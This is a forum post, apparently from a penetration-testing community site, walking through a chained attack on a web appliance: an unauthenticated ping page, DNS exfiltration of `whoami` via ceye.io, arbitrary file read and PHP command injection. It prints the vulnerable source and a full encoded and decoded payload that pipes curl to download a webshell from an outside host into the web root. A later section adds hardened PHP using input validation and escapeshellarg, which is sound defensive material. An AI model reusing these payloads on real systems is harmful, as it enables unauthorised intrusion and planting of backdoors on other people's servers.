China Network Penetration Testing Alliance

Title: Web security in practice: getting a webshell through an OS command injection vulnerability

Author: admin    Time: 2022-3-31 01:39
**1. Finding a way in**

**Viewing the page source (right-click, View Source) showed that the system's fingerprint is images/select_bg.png. Searching ZoomEye for it gives the following:**

![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Both reporter and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) use this fingerprint. I had worked on this kind of system before and had its source code; comparing the source tree against the target turned up a page that can be reached without authentication.**

**Its address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**, as shown here:**

![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**Testing the ping function here showed that its normal behaviour can be bypassed to execute commands; the payload is:**

**`whoami`.1111.ceye.io** **, as shown here:**

![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The DNS record that came back:**

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**This showed that the current user is root.**
**2. Chaining vulnerabilities to get a webshell**

**This article follows the order in which the bugs were found, so the next step was running pwd to get the web root, as shown here:**

![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**This gave the site path: /var/www/html/view/systemconfig/systemtool/**

**With Burp Suite I had also found an OS command injection vulnerability and an arbitrary file read vulnerability; the screenshot below shows the arbitrary file read:**

![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The OS command injection lives in /var/www/html/view/Behavior/toQuery.php; this path came from the command execution obtained in step one by bypassing the ping function. Using the arbitrary file read, we pull its source code:**

![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The source code is:**
```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php
session_start ();

if ($_GET ["objClass"] == "")
      exit ();

$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm") {
      $param ["user"] = $_SESSION ["s_userName"];
      $param ["lan"] = $_SESSION ["lan"];
      $param ["regUserpath"] = $_SESSION ["regUserpath"];

      exec ( "rm -rf /tmp/cache" );

      // objClass and method are concatenated into the shell command as-is;
      // the only check on objClass above is that it is not empty.
      $cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
      $cmd .= " " . $_GET ["objClass"];
      $cmd .= " " . $_GET ["method"];
      $cmd .= " " . base64_encode ( json_encode ( $param ) );

      file_put_contents("/tmp/query_cmd",$cmd);

      exec ( $cmd . " > /dev/null &" );
} else {
      require_once ($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
      $obj = new QueryInterface ();
      $instance = $obj->getInstance ();
      $instance->invokeMethod ( $_GET ["objClass"], $_GET ["method"], $param );
}

exit ();
?>
```

**A quick audit shows: if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm"), i.e. as long as method equals one of getList, import or processAlarm, then $cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php"; so cmd is the absolute web path + system/behavior/behavior_query.php, followed by file_put_contents("/tmp/query_cmd",$cmd);**

**exec ( $cmd . " > /dev/null &" );** **hands us a parameter we can inject a command into, which is a straightforward OS command injection vulnerability. My demonstration follows:**

![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**In the figure, objClass= is the parameter with the OS command injection vulnerability. I first tried to get a reverse shell with bash, but after a whole night of testing it never connected back, so in the end I chose to download a webshell with curl. The payload is:**

**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**

**URL-decoded, it reads:**

**|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**
**All those pipe characters | are there to close off the payload. In the end curl downloaded the webshell successfully, as shown here:**

![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

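Both bugs in this writeup come from the same pattern: a request parameter (the ping target in step one, objClass and method in toQuery.php) is concatenated into a string that is handed to exec(). As an added example, not the vendor's code, the following PHP shows hardened counterparts of the two handlers: the ping target must be an IP address or an RFC 1123 hostname, objClass must be a bare identifier, method must be one of the three values toQuery.php dispatches on, and every token is passed through escapeshellarg() before the shell sees it, so a value such as `#' |curl ...` would stay inside its single quotes instead of terminating the command. Function names, the `packetSize` parameter (the page only shows text_packetsize=64) and the inputs in the self-check are assumptions made for this illustration.

```php
<?php
// Added example, not the vendor's code: hardened counterparts of the ping
// handler and the toQuery.php dispatcher discussed in the writeup. Function
// names and the sample inputs in the self-check are constructed for this
// illustration.
declare(strict_types=1);

// The three dispatch values toQuery.php actually accepts; anything else is an error.
const ALLOWED_METHODS = ['getList', 'import', 'processAlarm'];

/** objClass must be a bare identifier; returns null for anything else. */
function validateObjClass(string $objClass): ?string
{
    return preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $objClass) === 1
        ? $objClass
        : null;
}

/** Ping target: an IPv4/IPv6 address or an RFC 1123 hostname, nothing else. */
function validatePingTarget(string $host): ?string
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // One hostname label: letters, digits and inner hyphens, at most 63 chars.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $isHostname = strlen($host) <= 253
        && preg_match("/\\A{$label}(?:\\.{$label})*\\z/", $host) === 1;
    return $isHostname ? $host : null;
}

/**
 * Replacement for the string-building block in toQuery.php. Validation
 * rejects shell syntax outright; escapeshellarg() on every token is the
 * second layer, so even a value such as  #' |curl ...  would stay inside
 * its own single quotes instead of terminating the command.
 */
function buildQueryCommand(string $objClass, string $method, array $param, string $docRoot): ?string
{
    $class = validateObjClass($objClass);
    if ($class === null || !in_array($method, ALLOWED_METHODS, true)) {
        return null;
    }
    $argv = [
        '/usr/local/php/bin/php',
        rtrim($docRoot, '/') . '/system/behavior/behavior_query.php',
        $class,
        $method,
        base64_encode(json_encode($param, JSON_THROW_ON_ERROR)),
    ];
    return implode(' ', array_map('escapeshellarg', $argv));
}

/** Replacement for the ping feature: the target is validated, then quoted. */
function buildPingCommand(string $host, int $packetSize = 64): ?string
{
    $target = validatePingTarget($host);
    // 1472 is a policy cap (one Ethernet frame), not a protocol limit.
    if ($target === null || $packetSize < 0 || $packetSize > 1472) {
        return null;
    }
    // $packetSize is an int, so it cannot carry shell syntax; %d keeps it that way.
    return sprintf('ping -c 4 -s %d %s', $packetSize, escapeshellarg($target));
}

// Self-check with constructed inputs in the shapes seen in the writeup.
if (PHP_SAPI === 'cli') {
    foreach (['Device', '|id', "Device #' |id"] as $v) {
        $cmd = buildQueryCommand($v, 'getList', ['user' => 'demo'], '/var/www/html');
        printf("objClass %-24s -> %s\n", var_export($v, true), $cmd ?? 'REJECTED');
    }
    printf("method   %-24s -> %s\n", "'delete'",
        buildQueryCommand('Device', 'delete', [], '/var/www/html') ?? 'REJECTED');
    foreach (['192.0.2.10', 'gateway.example', '`whoami`.1111.ceye.io'] as $v) {
        printf("ping     %-24s -> %s\n", var_export($v, true), buildPingCommand($v) ?? 'REJECTED');
    }
}
```

Running the self-check, only `Device`, the allowed method, `192.0.2.10` and `gateway.example` produce a command; the pipe, the `#'` sequence and the backtick host are all rejected before escapeshellarg() is even reached. On PHP 7.4 or later the same argv array can be given to proc_open() directly, which starts the worker without any shell and makes the quoting layer unnecessary.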
**3. Summary**

**That this case ended in a webshell depended largely on combining several vulnerabilities. First, viewing the page source identified the system the target runs, and I had tested a similar program before. Then, going straight for the known weak spot, I found the unauthenticated ping page and, by bypassing the ping function's normal behaviour, ran pwd to get the site's absolute path. Next, the arbitrary file read was used to pull the PHP file suspected of OS command execution and give it a quick audit, which confirmed the vulnerability. Finally, an OS command execution payload was built and the webshell obtained. The whole process was a chain of vulnerabilities; penetration testing more often comes down to luck, and if any one link in the chain had not existed or had not been found, getting the webshell could have failed.**

**All in all, luck matters as much as bug-hunting skill. Thanks for reading!**

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2